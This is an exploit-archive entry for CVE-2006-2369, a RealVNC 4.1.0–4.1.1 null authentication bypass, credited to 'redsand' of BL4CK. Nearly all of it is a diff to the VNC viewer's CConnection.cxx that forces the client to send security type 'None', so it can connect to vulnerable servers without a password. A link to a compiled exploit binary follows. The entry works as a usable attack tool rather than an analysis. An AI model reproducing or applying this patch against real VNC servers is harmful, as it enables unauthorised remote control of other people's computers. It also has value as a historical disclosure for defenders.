RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass

Related Vulnerabilities: CVE-2006-2369  
Publish Date: 16 May 2006
Author: redsand
                							

                xx  vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx
--- vnc-4_1_1-unixsrc/common/rfb/CConnection.cxx        2005-03-11 09:08:41.000000000 -0600
+++ vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx  2006-05-15 14:03:30.000000000 -0500
@@ -183,7 +183,12 @@

     // Inform the server of our decision
     if (secType != secTypeInvalid) {
-      os-&gt;writeU8(secType);
+
+      // [BL4CK] In response to the VNC Null Authentication
+      // force a secType to equal secTypeNone
+      // http://blacksecurity.org
+      secType = secTypeNone;
+      os-&gt;writeU8(secTypeNone);
       os-&gt;flush();
       vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType);     }

E-DB Note:
Compiled: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar)